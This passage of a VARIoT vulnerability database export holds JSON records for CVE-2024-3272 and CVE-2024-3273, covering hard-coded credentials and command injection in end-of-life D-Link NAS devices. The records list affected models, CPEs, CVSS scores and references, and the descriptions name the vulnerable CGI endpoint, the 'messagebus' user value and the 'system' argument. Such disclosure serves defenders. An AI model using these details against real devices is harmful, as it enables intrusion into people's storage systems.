"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-315l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-343",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-325",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-315l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320lw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-321:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-322l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-323:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-325_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-325:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-327l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-327l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-340l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-340l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-343:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-345:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-726-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1100-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1200-05_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1550-04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1550-04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"cve": "CVE-2024-3272",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2024-3272",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2024-3272",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2024-3272",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3272"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-3272",
"trust": 2.6
},
{
"db": "VULDB",
"id": "259283",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10383",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003106",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"id": "VAR-202404-0069",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6929112399999999
},
"last_update_date": "2024-06-05T23:17:51.346000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.0
},
{
"problemtype": "Use hard-coded credentials (CWE-798) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/netsecfish/dlink"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=sap10383"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.259283"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.259283"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-3272"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"date": "2024-04-04T01:15:50.123000",
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T06:10:00",
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"date": "2024-06-04T19:20:18.520000",
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0D-Link\u00a0Systems,\u00a0Inc.\u00a0 Product use of hardcoded credentials vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
}
],
"trust": 0.8
}
}
VAR-202404-0070
Vulnerability from variot - Updated: 2024-06-05 23:17
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. Multiple D-Link Systems, Inc. products, including DNS-320L firmware, DNS-120 firmware and DNR-202L firmware, contain a command injection vulnerability. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. The affected_products list in the record below names more DNS and DNR models than the four in this summary, and the record's references include the CISA Known Exploited Vulnerabilities catalog.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202404-0070",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dns-320l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-202l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-327l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1550-04",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1200-05",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-340l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-322l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-345",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-321",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-726-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-323",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-120",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-315l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-343",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-325",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-315l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320lw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
